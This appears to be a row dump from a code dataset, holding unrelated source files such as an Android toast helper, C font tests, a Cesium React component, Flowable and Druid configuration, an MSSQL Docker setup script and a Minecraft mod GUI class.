text stringlengths 1 1.05M |
|---|
package com.smallcake.utils;
import android.content.Context;
import java.util.Timer;
import java.util.TimerTask;
/**
* 接受三种类型的msg
* String ,int ,CharSequence
* T改为ToastUtil避免和泛型T冲突
*/
public class ToastUtil {
private ToastUtil() {
/* cannot be instantiated */
throw new UnsupportedOperationException("cannot be instantiated");
}
public static void showLong( Object message) {
show(SmallUtils.getApp(),message, android.widget.Toast.LENGTH_LONG);
}
public static void showShort( Object message) {
show(SmallUtils.getApp(),message, android.widget.Toast.LENGTH_SHORT);
}
public static void showGravityLong( Object message, int gravity) {
showGravity(SmallUtils.getApp(),message,gravity, android.widget.Toast.LENGTH_LONG);
}
public static void showGravityShort( Object message, int gravity) {
showGravity(SmallUtils.getApp(),message,gravity, android.widget.Toast.LENGTH_SHORT);
}
public static void showMyToast(String message, final int cnt) {
final android.widget.Toast toast = android.widget.Toast.makeText(SmallUtils.getApp(), message, android.widget.Toast.LENGTH_LONG);
final Timer timer = new Timer();
timer.schedule(new TimerTask() {
@Override
public void run() {
toast.show();
}
}, 0, 3500);
new Timer().schedule(new TimerTask() {
@Override
public void run() {
toast.cancel();
timer.cancel();
}
}, cnt );
}
private static void show(Context context,Object message,int duration){
if (message instanceof String){
android.widget.Toast.makeText(SmallUtils.getApp(),(String)message, duration).show();
}else if (message instanceof Integer){
android.widget.Toast.makeText(SmallUtils.getApp(),(int)message, duration).show();
}else if (message instanceof CharSequence){
android.widget.Toast.makeText(SmallUtils.getApp(),(CharSequence)message, duration).show();
}else{
printErr(message);
}
}
private static void showGravity(Context context,Object message, int gravity,int duration){
android.widget.Toast toast = null;
if (message instanceof String){
toast = android.widget.Toast.makeText(SmallUtils.getApp(),(String)message, duration);
}else if (message instanceof Integer){
toast = android.widget.Toast.makeText(SmallUtils.getApp(),(int)message, duration);
}else if (message instanceof CharSequence){
toast = android.widget.Toast.makeText(SmallUtils.getApp(),(CharSequence)message, duration);
}else{
printErr(message);
return;
}
toast.setGravity(gravity,0, (int) (64 * context.getResources().getDisplayMetrics().density + 0.5));
toast.show();
}
private static void printErr(Object message) {
try {
throw new UnsupportedOperationException(message+" must be String|int|CharSequence");
} catch (UnsupportedOperationException e) {
e.printStackTrace();
}
}
}
|
package com.lilarcor.popularmovies.framework.foundation.network.contracts;
import android.support.annotation.NonNull;
/**
* Created by <NAME> on 12/07/15.
*
* This contract provides methods to do basic network request
* operations, and offers response caching configured on a per
* request basis.
*
*/
public interface NetworkRequestProvider {
/**
* Request callback delegate to return successful or failed
* network request attempts. Is used for each request attempt.
*
* IMPORTANT NOTE: Any callback delegate methods are NOT executed
* on the main thread. It is the caller's responsibility to make
* any code after the callback invocation run on the main thread if
* required.
*
* This design decision was deliberate - because it will allow the
* receiver of the callback to continue to run in the worker thread
* to complete any parsing of the response data etc, and therefore
* get some async benefit for free.
*/
interface RequestDelegate {
/**
* If the request reports to have completed successfully, this method
* will be called with the resulting status code and raw string response.
*
* @param statusCode of the network operation.
* @param response the raw string response text received.
*/
void onRequestComplete(int statusCode, @NonNull String response);
/**
* If the request reports to have failed, this method will be called.
*/
void onRequestFailed();
}
/**
* Begin a new GET request with the given tag, url and callback
* delegate.
*
* @param requestTag a unique tag for the request, to allow it to be identified for operations such as cancelling.
* @param url the full http url to request.
* @param maxCacheAgeInHours the value of this argument will determine how old the given request can be without attempting to connect
* to the server. If the request has been cached previously and is younger than the max age, then it will
* be returned instead of the full network request. For requests that should always go to the server, this
* argument can be specified as 0 which will cause the next request to immediately be too old.
* @param callbackDelegate the request callback delegate for when the request completes.
*/
void startGetRequest(@NonNull String requestTag, @NonNull String url, int maxCacheAgeInHours, @NonNull RequestDelegate callbackDelegate);
/**
* Clear any cached responses so requests will resolve to the server again.
*
* @return true if the cache was successfully cleared.
*/
boolean clearResponseCache();
}
|
<filename>src/errors/CXImplicationError.java
package errors;
import tree.TreeNode;
public class CXImplicationError extends CXError {
/**
*
*/
private static final long serialVersionUID = 4960599050470044576L;
public CXImplicationError(String string, TreeNode node) {
super(string, node);
// TODO Auto-generated constructor stub
}
}
|
/*
*
*/
package net.community.chest.javaagent.dumper.ui.tree;
import net.community.chest.javaagent.dumper.ui.data.SelectiblePackageInfo;
/**
* <P>Copyright as per GPLv2</P>
* @author <NAME>.
* @since Aug 14, 2011 1:13:56 PM
*/
public class PackageNode extends AbstractInfoNode<SelectiblePackageInfo> {
private static final long serialVersionUID = -7512566366222245598L;
public PackageNode (SelectiblePackageInfo info)
{
this(info, true);
}
public PackageNode (SelectiblePackageInfo info, boolean withChildren)
{
super(SelectiblePackageInfo.class, info, info.getName(), withChildren);
}
}
|
import { Module } from '@nestjs/common';
import { AppController } from './app.controller';
import { AppService } from './app.service';
import { UserModule } from './modules/user/user.module';
import { OrmModule } from './modules/orm/orm.module';
import { UserProfileModule } from './modules/user-profile/user-profile.module';
import { TesteModule } from './src/modules/teste/teste.module';
import { TesteModule } from './modules/teste/teste.module';
import { TesteModule } from './src/modules/teste/teste.module';
@Module({
imports: [OrmModule, UserModule, UserProfileModule, TesteModule],
controllers: [AppController],
providers: [AppService],
})
export class AppModule {}
|
<filename>core/c/tests/font_tests.c<gh_stars>1-10
#include <flowi_core/font.h>
#include "../src/atlas.h"
#include "../src/font_private.h"
#include "../src/internal.h"
#include "utest.h"
struct FlContext;
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
UTEST(Font, load_failed) {
struct FlGlobalState* state = fl_create(NULL);
struct FlContext* ctx = fl_context_create(state);
FlFont font_id = fl_font_new_from_file(ctx, "unable_to_load.bin", 12, FlFontPlacementMode_Auto);
// Expect loading fail
ASSERT_TRUE(font_id == 0);
fl_context_destroy(ctx);
fl_destroy(state);
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
UTEST(Font, load_font_ok) {
struct FlGlobalState* state = fl_create(NULL);
struct FlContext* ctx = fl_context_create(state);
FlFont font_id = fl_font_new_from_file(ctx, "data/montserrat-regular.ttf", 36, FlFontPlacementMode_Auto);
// Expect loading to work
ASSERT_NE(0, font_id);
// fl_font_destroy(font_id);
fl_context_destroy(ctx);
fl_destroy(state);
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
UTEST(Font, calc_text_size) {
struct FlGlobalState* state = fl_create(NULL);
struct FlContext* ctx = fl_context_create(state);
FlFont font_id = fl_font_new_from_file(ctx, "data/montserrat-regular.ttf", 36, FlFontPlacementMode_Auto);
u32 codepoints[] = {'A', 'B', 'c', ' '};
ctx->current_font = (Font*)Handles_get_data(&state->font_handles, font_id);
ctx->current_font_size = 36;
FlIVec2 size = Font_calc_text_size(ctx, codepoints, 4);
ASSERT_EQ(66, size.x);
ASSERT_EQ(25, size.y);
fl_context_destroy(ctx);
fl_destroy(state);
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
UTEST(Font, gen_glyph_verify_render_cmds) {
struct FlGlobalState* state = fl_create(NULL);
struct FlContext* ctx = fl_context_create(state);
FlFont font_id = fl_font_new_from_file(ctx, "data/montserrat-regular.ttf", 36, FlFontPlacementMode_Auto);
u32 test[] = {64, 65};
int count = fl_render_begin_commands(state);
const u8* cmd_data = NULL;
bool found_create_texture = false;
bool found_update_texture = false;
// process all the render commands
for (int i = 0; i < count; ++i) {
switch (fl_render_get_command(state, &cmd_data)) {
case FlRenderCommand_CreateTexture: {
const FlCreateTexture* cmd = (FlCreateTexture*)cmd_data;
// Don't assert directly as we may have more textures being created
// so we verify that we have one that matches what we want
if (cmd->width == 4096 && cmd->height == 4096 && cmd->format == FlTextureFormat_R8Linear) {
found_create_texture = true;
}
break;
}
}
}
ASSERT_TRUE(found_create_texture);
// Begin frame and generate some glyphs and figure out the range to update
fl_frame_begin(ctx, 640, 480, 1.0f / 60.f);
Atlas_begin_add_rects(state->mono_fonts_atlas);
Font_generate_glyphs(ctx, (Font*)Handles_get_data(&state->font_handles, font_id), test, 2, 36);
Atlas_end_add_rects(state->mono_fonts_atlas, state);
fl_frame_end(ctx);
count = fl_render_begin_commands(state);
// Expect a update texture command here
for (int i = 0; i < count; ++i) {
switch (fl_render_get_command(state, &cmd_data)) {
case FlRenderCommand_UpdateTexture: {
const FlUpdateTexture* cmd = (FlUpdateTexture*)cmd_data;
ASSERT_NE(cmd->data, NULL);
ASSERT_EQ(cmd->texture_id, state->mono_fonts_atlas->texture_id);
found_update_texture = true;
break;
}
}
}
// validate that we have created some textures
ASSERT_TRUE(found_update_texture);
fl_font_destroy(ctx, font_id);
fl_context_destroy(ctx);
fl_destroy(state);
}
|
#import <Foundation/Foundation.h>
int main(int argc, const char * argv[]) {
@autoreleasepool {
int max;
scanf("%d", &max);
for (int i = 2; i <= max; i++) {
bool prime = true;
for (int j = 2; j < i; j++) {
if (i % j == 0) {
prime = false;
break;
}
}
if (prime) {
NSLog(@"%d", i);
}
}
}
return 0;
} |
<gh_stars>0
import Cesium from "cesium";
import createCesiumComponent, { EventkeyMap } from "./core/CesiumComponent";
export interface CzmlDataSourceCesiumProps {
clustering?: Cesium.EntityCluster;
}
export interface CzmlDataSourceCesiumReadonlyProps {
name?: string;
}
export interface CzmlDataSourceCesiumEvents {
onChange?: (CzmlDataSource: Cesium.CzmlDataSource) => void;
onError?: (CzmlDataSource: Cesium.CzmlDataSource, error: any) => void;
onLoading?: (CzmlDataSource: Cesium.CzmlDataSource, isLoaded: boolean) => void;
}
export interface CzmlDataSourceProps
extends CzmlDataSourceCesiumProps,
CzmlDataSourceCesiumReadonlyProps,
CzmlDataSourceCesiumEvents {
data?: Cesium.Resource | string | object;
sourceUri?: string;
show?: boolean;
onLoad?: (CzmlDataSouce: Cesium.CzmlDataSource) => void;
}
export interface CzmlDataSourceContext {
dataSourceCollection?: Cesium.DataSourceCollection;
}
const cesiumProps: Array<keyof CzmlDataSourceCesiumProps> = ["clustering"];
const cesiumReadonlyProps: Array<keyof CzmlDataSourceCesiumReadonlyProps> = ["name"];
const cesiumEventProps: EventkeyMap<Cesium.CzmlDataSource, keyof CzmlDataSourceCesiumEvents> = {
changedEvent: "onChange",
errorEvent: "onError",
loadingEvent: "onLoading",
};
const load = ({
element,
data,
onLoad,
sourceUri,
}: {
element: Cesium.CzmlDataSource;
dataSources: Cesium.DataSourceCollection;
data: Cesium.Resource | string | object;
onLoad?: (CzmlDataSource: Cesium.CzmlDataSource) => void;
sourceUri?: string;
}) => {
element
.load(data, {
sourceUri,
})
.then(value => {
if (onLoad) {
try {
onLoad(value);
} catch (e) {
throw e;
}
}
});
};
const CzmlDataSource = createCesiumComponent<
Cesium.CzmlDataSource,
CzmlDataSourceProps,
CzmlDataSourceContext
>({
name: "CzmlDataSource",
create(cprops, props) {
const ds = new Cesium.CzmlDataSource(props.name);
if (cprops.clustering) {
ds.clustering = cprops.clustering;
}
if (typeof cprops.show === "boolean") {
ds.show = cprops.show;
}
return ds;
},
mount(element, context, props) {
if (context.dataSourceCollection) {
context.dataSourceCollection.add(element);
if (props.data) {
load({
element,
dataSources: context.dataSourceCollection,
data: props.data,
onLoad: props.onLoad,
sourceUri: props.sourceUri,
});
}
}
},
update(element, props, prevProps, context) {
if (prevProps.show !== props.show || !props.data) {
element.show = !!props.data && (typeof props.show === "boolean" ? props.show : true);
}
if (
context.dataSourceCollection &&
props.data &&
(prevProps.data !== props.data || prevProps.sourceUri !== props.sourceUri)
) {
load({
element,
dataSources: context.dataSourceCollection,
data: props.data,
onLoad: props.onLoad,
sourceUri: props.sourceUri,
});
}
},
unmount(element, context) {
if (context.dataSourceCollection && !context.dataSourceCollection.isDestroyed()) {
context.dataSourceCollection.remove(element);
}
},
cesiumProps,
cesiumReadonlyProps,
cesiumEventProps,
});
export default CzmlDataSource;
|
import { withIcon } from "../withIcon";
import { ReactComponent as Icon } from "./chevron-left.svg";
export const IconChevronLeft = withIcon(Icon);
|
package com.home.demo.config;
import javax.sql.DataSource;
import org.flowable.engine.HistoryService;
import org.flowable.engine.IdentityService;
import org.flowable.engine.ManagementService;
import org.flowable.engine.ProcessEngine;
import org.flowable.engine.ProcessEngineConfiguration;
import org.flowable.engine.RepositoryService;
import org.flowable.engine.RuntimeService;
import org.flowable.engine.TaskService;
import org.flowable.engine.impl.cfg.StandaloneProcessEngineConfiguration;
import org.flowable.idm.engine.IdmEngineConfiguration;
import org.flowable.idm.engine.impl.cfg.StandaloneIdmEngineConfiguration;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.boot.bind.RelaxedPropertyResolver;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.Primary;
import org.springframework.core.env.Environment;
@Configuration
public class ProcessEngineConfig {
//方案三 注入environment 通过environment获取
@Autowired
private Environment environment;
public void init(){
//RelaxedPropertyResolver propertyResolver =
new RelaxedPropertyResolver(environment, "mysql.flowable.");
//String url = environment.getProperty("url");
}
@Bean(name = "idmEngineConfiguration")
@Primary
public IdmEngineConfiguration idmEngineConfiguration(@Qualifier("dataSource") DataSource dataSource) {
IdmEngineConfiguration idmEngineConfiguration = new StandaloneIdmEngineConfiguration();
idmEngineConfiguration.setDataSource(dataSource);
return idmEngineConfiguration;
}
@Bean(name = "processEngineConfiguration")
@Primary
public ProcessEngineConfiguration processEngineConfiguration(@Qualifier("dataSource") DataSource dataSource) {
ProcessEngineConfiguration cfg =
new StandaloneProcessEngineConfiguration()
.setDataSource(dataSource)
.setDatabaseSchemaUpdate(ProcessEngineConfiguration.DB_SCHEMA_UPDATE_TRUE);
// .setAsyncExecutorActivate( Boolean.valueOf(environment.getProperty("asyncExecutorActivate")))
// .setMailServerHost( environment.getProperty("mailServerHost"))
// .setMailServerPort( Integer.valueOf(environment.getProperty("mailServerPort")));
return cfg;
}
@Bean(name = "processEngine")
@Primary
public ProcessEngine processEngine(
@Qualifier("processEngineConfiguration") ProcessEngineConfiguration processEngineConfiguration)
throws Exception {
ProcessEngine processEngine = processEngineConfiguration.buildProcessEngine();
return processEngine;
}
@Bean(name = "repositoryService")
@Primary
public RepositoryService repositoryService(
@Qualifier("processEngine") ProcessEngine processEngine)
throws Exception {
return processEngine.getRepositoryService();
}
@Bean(name = "runtimeService")
@Primary
public RuntimeService runtimeService(
@Qualifier("processEngine") ProcessEngine processEngine)
throws Exception {
return processEngine.getRuntimeService();
}
@Bean(name = "taskService")
@Primary
public TaskService taskService(
@Qualifier("processEngine") ProcessEngine processEngine)
throws Exception {
return processEngine.getTaskService();
}
@Bean(name = "historyService")
@Primary
public HistoryService historyService(
@Qualifier("processEngine") ProcessEngine processEngine)
throws Exception {
return processEngine.getHistoryService();
}
@Bean(name = "managementService")
@Primary
public ManagementService managementService(
@Qualifier("processEngine") ProcessEngine processEngine)
throws Exception {
return processEngine.getManagementService();
}
@Bean(name = "identityService")
@Primary
public IdentityService identityService(
@Qualifier("processEngine") ProcessEngine processEngine)
throws Exception {
return processEngine.getIdentityService();
}
}
|
$LOAD_PATH.unshift(File.dirname(__FILE__))
$LOAD_PATH.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))
# just open four new windows and set name to each
require 'screen'
Screen('Beatles') {
['John', 'Paul', 'George', 'Ringo'].each {|member|
window(member)
}
}
|
/*
* Copyright [2020-2030] [https://www.stylefeng.cn]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Guns采用APACHE LICENSE 2.0开源协议,您在使用过程中,需要注意以下几点:
*
* 1.请不要删除和修改根目录下的LICENSE文件。
* 2.请不要删除和修改Guns源码头部的版权声明。
* 3.请保留源码和相关描述文件的项目出处,作者声明等。
* 4.分发源码时候,请注明软件出处 https://gitee.com/stylefeng/guns
* 5.在修改包名,模块名称,项目代码等时,请注明软件出处 https://gitee.com/stylefeng/guns
* 6.若您的项目无法满足以上几点,可申请商业授权
*/
package cn.stylefeng.roses.kernel.db.api.pojo.druid;
import lombok.Data;
import lombok.extern.slf4j.Slf4j;
/**
* <p>数据库数据源配置</p>
* <p>说明:类中属性包含默认值的不要在这里修改,应该在"application.yml"中配置</p>
*
* @author stylefeng
* @date 2017/5/21 11:18
*/
@Data
@Slf4j
public class DruidProperties {
/**
* 数据源名称,非druid的官方配置
*/
private String dataSourceName;
/**
* 连接数据库的url,不同数据库不一样。
* 例如:
* mysql : jdbc:mysql://10.20.153.104:3306/druid2
* oracle : jdbc:oracle:thin:@10.20.149.85:1521:ocnauto
*/
private String url;
/**
* 连接数据库的用户名
*/
private String username;
/**
* 连接数据库的密码。如果你不希望密码直接写在配置文件中,可以使用ConfigFilter。
* 详细看这里:https://github.com/alibaba/druid/wiki/%E4%BD%BF%E7%94%A8ConfigFilter
*/
private String password;
/**
* 这一项可配可不配,如果不配置druid会根据url自动识别dbType,然后选择相应的driverClassName
*/
private String driverClassName;
/**
* 初始化时建立物理连接的个数。初始化发生在显示调用init方法,或者第一次getConnection时
*/
private Integer initialSize = 2;
/**
* 最大连接池数量
*/
private Integer maxActive = 20;
/**
* 最小连接池数量
*/
private Integer minIdle = 1;
/**
* 获取连接时最大等待时间,单位毫秒。配置了maxWait之后,缺省启用公平锁,并发效率会有所下降,如果需要可以通过配置useUnfairLock属性为true使用非公平锁。
*/
private Integer maxWait = 60000;
/**
* 是否缓存preparedStatement,也就是PSCache。PSCache对支持游标的数据库性能提升巨大,比如说oracle。在mysql下建议关闭。
*/
private Boolean poolPreparedStatements = true;
/**
* 要启用PSCache,必须配置大于0,可以配置-1关闭
* 当大于0时,poolPreparedStatements自动触发修改为true。
* 在Druid中,不会存在Oracle下PSCache占用内存过多的问题,可以把这个数值配置大一些,比如说100
*/
private Integer maxPoolPreparedStatementPerConnectionSize = 100;
/**
* 用来检测连接是否有效的sql,要求是一个查询语句,常用select 'x'。
* 如果validationQuery为null,testOnBorrow、testOnReturn、testWhileIdle都不会起作用。
*/
private String validationQuery;
/**
* 单位:秒,检测连接是否有效的超时时间。底层调用jdbc Statement对象的void setQueryTimeout(int seconds)方法
*/
private Integer validationQueryTimeout = 10;
/**
* 申请连接时执行validationQuery检测连接是否有效,做了这个配置会降低性能。
*/
private Boolean testOnBorrow = true;
/**
* 归还连接时执行validationQuery检测连接是否有效,做了这个配置会降低性能。
*/
private Boolean testOnReturn = true;
/**
* 建议配置为true,不影响性能,并且保证安全性。
* 申请连接的时候检测,如果空闲时间大于timeBetweenEvictionRunsMillis,执行validationQuery检测连接是否有效。
*/
private Boolean testWhileIdle = true;
/**
* 连接池中的minIdle数量以内的连接,空闲时间超过minEvictableIdleTimeMillis,则会执行keepAlive操作。
*/
private Boolean keepAlive = false;
/**
* 有两个含义:
* 1) Destroy线程会检测连接的间隔时间,如果连接空闲时间大于等于 minEvictableIdleTimeMillis 则关闭物理连接。
* 2) testWhileIdle 的判断依据,详细看 testWhileIdle 属性的说明
*/
private Integer timeBetweenEvictionRunsMillis = 60000;
/**
* 连接保持空闲而不被驱逐的最小时间
*/
private Integer minEvictableIdleTimeMillis = 300000;
/**
* 属性类型是字符串,通过别名的方式配置扩展插件,常用的插件有:
* 监控统计用的filter:stat
* 日志用的filter:log4j
* 防御sql注入的filter:wall
*/
private String filters = "stat";
}
|
#!/bin/bash
set -e
set -x
#
# Copyright 2017 Goldman Sachs.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
INSTANCE_PORT=1433
INSTANCE_DBNAME="dbdeploy"
INSTANCE_USERID="sa" # note - this user ID is hardcoded by the container
INSTANCE_PASSWORD="Deploybuilddb0!"
CONTAINER_IMAGE="microsoft/mssql-server-linux:2017-latest"
CONTAINER_NAME=obevo-mssql-instance
OLD_CONTAINER_ID=$(docker ps -aqf "name=$CONTAINER_NAME")
if [ ! -z "$OLD_CONTAINER_ID" ]
then
echo "Shutting down old container"
docker stop $OLD_CONTAINER_ID
docker rm $OLD_CONTAINER_ID
fi
echo "Setting password $INSTANCE_PASSWORD"
docker pull $CONTAINER_IMAGE
docker run -e "ACCEPT_EULA=Y" -e "SA_PASSWORD=$INSTANCE_PASSWORD" \
-p $INSTANCE_PORT:$INSTANCE_PORT --name $CONTAINER_NAME \
-d $CONTAINER_IMAGE
echo "Container created"
|
package com.professorvennie.bronzeage.client.gui;
import com.professorvennie.bronzeage.BronzeAge;
import com.professorvennie.bronzeage.api.enums.RedstoneMode;
import com.professorvennie.bronzeage.client.gui.buttons.GuiButtonRedStone;
import com.professorvennie.bronzeage.core.network.MessageButton;
import com.professorvennie.bronzeage.core.network.PacketHandler;
import com.professorvennie.bronzeage.lib.Reference;
import com.professorvennie.bronzeage.tileentitys.TileEntityBasicMachine;
import com.professorvennie.bronzeage.tileentitys.TileEntityBasicSidedInventory;
import net.minecraft.client.Minecraft;
import net.minecraft.client.gui.FontRenderer;
import net.minecraft.client.gui.GuiButton;
import net.minecraft.client.gui.inventory.GuiContainer;
import net.minecraft.client.renderer.Tessellator;
import net.minecraft.client.resources.I18n;
import net.minecraft.inventory.Container;
import net.minecraft.util.IIcon;
import net.minecraft.util.ResourceLocation;
import net.minecraft.util.StatCollector;
import net.minecraftforge.fluids.FluidStack;
import net.minecraftforge.fluids.FluidTank;
import org.lwjgl.input.Mouse;
import org.lwjgl.opengl.GL11;
import java.util.ArrayList;
import java.util.List;
/**
* Created by ProfessorVennie on 10/23/2014 at 9:48 PM.
*/
public class GuiBase extends GuiContainer {
public ResourceLocation backGround;
public ResourceLocation elements = new ResourceLocation(Reference.MOD_ID, "textures/gui/guiElements.png");
public TileEntityBasicMachine basicSteamMachine;
protected int mouseX = 0, mouseY = 0;
protected List tabList = new ArrayList();
public GuiBase(Container container, TileEntityBasicSidedInventory tileEntity) {
this(container, null);
}
public GuiBase(Container container, TileEntityBasicMachine basicMachine) {
super(container);
this.basicSteamMachine = basicMachine;
}
@Override
public void initGui() {
super.initGui();
buttonList.add(new GuiButtonRedStone(0, guiLeft + xSize + 1, guiTop + ySize - 160, basicSteamMachine));
}
@Override
protected void drawGuiContainerBackgroundLayer(float p_146976_1_, int p_146976_2_, int p_146976_3_) {
GL11.glColor4f(0F, 0.30F, 0.97F, 1F);
Minecraft.getMinecraft().getTextureManager().bindTexture(elements);
if (basicSteamMachine != null) {
GL11.glColor4f(0.97F, 0.00F, 0F, 1F);
drawTexturedModalRect(guiLeft + 176, guiTop + 3, 0, 93, 28, 28);
//drawTexturedModalRect(guiLeft + 176, guiTop + 31, 0, 93, 28, 28);
}
GL11.glColor4f(1F, 1F, 1F, 1F);
if (backGround != null) {
Minecraft.getMinecraft().getTextureManager().bindTexture(backGround);
drawTexturedModalRect(guiLeft, guiTop, 0, 0, xSize, ySize);
}
}
@Override
protected void drawGuiContainerForegroundLayer(int p_146979_1_, int p_146979_2_) {
this.fontRendererObj.drawString(I18n.format("container.inventory", BronzeAge.INSTANSE), 8, this.ySize - 96 + 2, 4210752);
String name = "";
if (basicSteamMachine != null)
name = StatCollector.translateToLocal("container." + basicSteamMachine.getInventoryName());
this.fontRendererObj.drawString(name, this.xSize / 2 - this.fontRendererObj.getStringWidth(name) / 2, 6, 4210752);
}
@Override
protected void actionPerformed(GuiButton button) {
switch (button.id) {
case 0:
if (button instanceof GuiButtonRedStone) {
if (basicSteamMachine != null) {
GuiButtonRedStone buttonRedStone = (GuiButtonRedStone) button;
switch (basicSteamMachine.getRedStoneMode()) {
case low:
buttonRedStone.setMode(RedstoneMode.high);
basicSteamMachine.setRedstoneMode(RedstoneMode.high);
PacketHandler.INSTANCE.sendToServer(new MessageButton(basicSteamMachine.xCoord, basicSteamMachine.yCoord, basicSteamMachine.zCoord, 0));
break;
case high:
buttonRedStone.setMode(RedstoneMode.disabled);
basicSteamMachine.setRedstoneMode(RedstoneMode.disabled);
PacketHandler.INSTANCE.sendToServer(new MessageButton(basicSteamMachine.xCoord, basicSteamMachine.yCoord, basicSteamMachine.zCoord, 1));
break;
case disabled:
buttonRedStone.setMode(RedstoneMode.low);
basicSteamMachine.setRedstoneMode(RedstoneMode.low);
PacketHandler.INSTANCE.sendToServer(new MessageButton(basicSteamMachine.xCoord, basicSteamMachine.yCoord, basicSteamMachine.zCoord, 2));
break;
}
break;
}
}
}
}
@Override
public void handleMouseInput() {
super.handleMouseInput();
int x = Mouse.getEventX() * this.width / this.mc.displayWidth;
int y = this.height - Mouse.getEventY() * this.height / this.mc.displayHeight - 1;
mouseX = x - guiLeft;
mouseY = y - guiTop;
}
public void drawElement(int x, int y, int u, int v, int width, int height) {
this.drawTexturedModalRect(guiLeft + x, guiTop + y, u, v, width, height);
}
public int getValueScaled(int value, int max, int scale) {
return (value * scale) / max;
}
public void drawToolTipOverArea(int mouseX, int mouseY, int minX, int minY, int maxX, int maxY, List<String> list, FontRenderer font) {
if (list != null && font != null) {
if ((mouseX >= minX && mouseX <= maxX) && (mouseY >= minY && mouseY <= maxY))
drawHoveringText(list, mouseX, mouseY, font);
}
}
public void drawTank(FluidTank tank, int scale, int x, int y, int width) {
int j;
if (tank.getFluid() != null) {
j = getValueScaled(tank.getFluidAmount(), tank.getCapacity(), scale);
this.drawFluid(guiLeft + x, guiTop + y - j, tank.getFluid(), width, j);
}
}
public void drawFluid(int x, int y, FluidStack fluid, int width, int height) {
if (fluid == null || fluid.getFluid() == null)
return;
mc.renderEngine.bindTexture(new ResourceLocation("textures/atlas/blocks.png"));
GL11.glColor3ub((byte) (fluid.getFluid().getColor() >> 16 & 0xFF), (byte) (fluid.getFluid().getColor() >> 8 & 0xFF), (byte) (fluid.getFluid().getColor() & 0xFF));
drawTiledTexture(x, y, fluid.getFluid().getIcon(fluid), width, height);
}
public void drawTiledTexture(int x, int y, IIcon icon, int width, int height) {
int i = 0;
int j = 0;
int drawHeight = 0;
int drawWidth = 0;
for (i = 0; i < width; i += 16) {
for (j = 0; j < height; j += 16) {
drawWidth = (width - i) < 16 ? (width - i) : 16;
drawHeight = (height - j) < 16 ? (height - j) : 16;
drawScaledTexturedModelRectFromIcon(x + i, y + j, icon, drawWidth, drawHeight);
}
}
GL11.glColor4f(1f, 1f, 1f, 1F);
}
public void drawScaledTexturedModelRectFromIcon(int x, int y, IIcon icon, int width, int height) {
if (icon == null)
return;
double minU = icon.getMinU();
double maxU = icon.getMaxU();
double minV = icon.getMinV();
double maxV = icon.getMaxV();
Tessellator tessellator = Tessellator.instance;
tessellator.startDrawingQuads();
tessellator.addVertexWithUV(x, y + height, this.zLevel, minU, minV + (maxV - minV) * height / 16F);
tessellator.addVertexWithUV(x + width, y + height, this.zLevel, minU + (maxU - minU) * width / 16F, minV + (maxV - minV) * height / 16F);
tessellator.addVertexWithUV(x + width, y, this.zLevel, minU + (maxU - minU) * width / 16F, minV);
tessellator.addVertexWithUV(x, y, this.zLevel, minU, minV);
tessellator.draw();
}
}
|
<gh_stars>0
class CapaMapaTiles {
constructor(datosCapa, indiceZ, anchoTiles, altoTiles, paletasSprites) {
this.anchoEnTiles = parseInt(datosCapa.width);
this.altoEnTiles = parseInt(datosCapa.height);
this.x = parseInt(datosCapa.x)
this.y = parseInt(datosCapa.y)
this.z = indiceZ;
this.tiles = [];
for (let y = 0; y < this.altoEnTiles; y++) {
for (let x = 0; x < this.anchoEnTiles; x++) {
let idSprite = datosCapa.data[x + y * this.anchoEnTiles]
// console.log(idSprite)
if (idSprite === 0) {
this.tiles.push(null);
} else {
let spriteActual = this.encontrarSpritePaletaId(idSprite - 1, paletasSprites)
this.tiles.push(new Tile(x, y, indiceZ, anchoTiles, altoTiles, spriteActual))
}
}
}
// this.altoEnTiles.map(y => {
// this.anchoEnTiles.map(x => {
// let idSprite = datosCapa[x + y * this.anchoEnTiles]
// if (idSprite === 0) {
// this.tiles.push(null)
// } else {
// let spriteActual = this.encontrarSpritePaletaId(idSprite, paletasSprites)
// this.tiles.push(new Tile(x, y, indiceZ, anchoTiles, altoTiles, spriteActual))
// }
// })
// })
}
encontrarSpritePaletaId(idSprite, paletaSprites) {
// console.log(idSprite)
// console.log(paletaSprites)
for (let s = 0; s < paletaSprites.length; s++) {
if (idSprite >= paletaSprites[s].primerSpriteSobreUno - 1 && idSprite < paletaSprites[s].totalSprites + paletaSprites[s].primerSpriteSobreUno + 1) {
console.log('entro aqui')
return paletaSprites[s].sprites[Math.abs(paletaSprites[s].primerSpriteSobreUno - 1 - idSprite)];
}
}
// paletasSprite.map(e => {
// if (idSprite >= e.primerSpriteSobreUno && idSprite < e.totalSprites + e.primerSpriteSobreUno + 1) {
// return e.sprites[Math.abs(e.primerSpriteSobreUno - 1 - idSprite)]
// }
// })
// throw new Error(`El ID sobre zero ${idSprite} del exprite no existe`)
}
} |
<gh_stars>0
package HexaGhost;
import java.util.concurrent.ThreadLocalRandom;
import Model.Cell;
public class HGDefense implements HGStrategy{
private HexaGhost hexaghost;
public HGDefense(HexaGhost hexaghost) {
this.hexaghost = hexaghost;
}
@Override
public Cell play() {
Cell cell = null;
int cValue = Integer.MIN_VALUE;
for(Cell c : hexaghost.getFreeCells()) {
int value;
if((value = hexaghost.cellValue(c.getX(), c.getY(), false)) > cValue) {
cell = c;
cValue = value;
}
}
return cell;
}
}
|
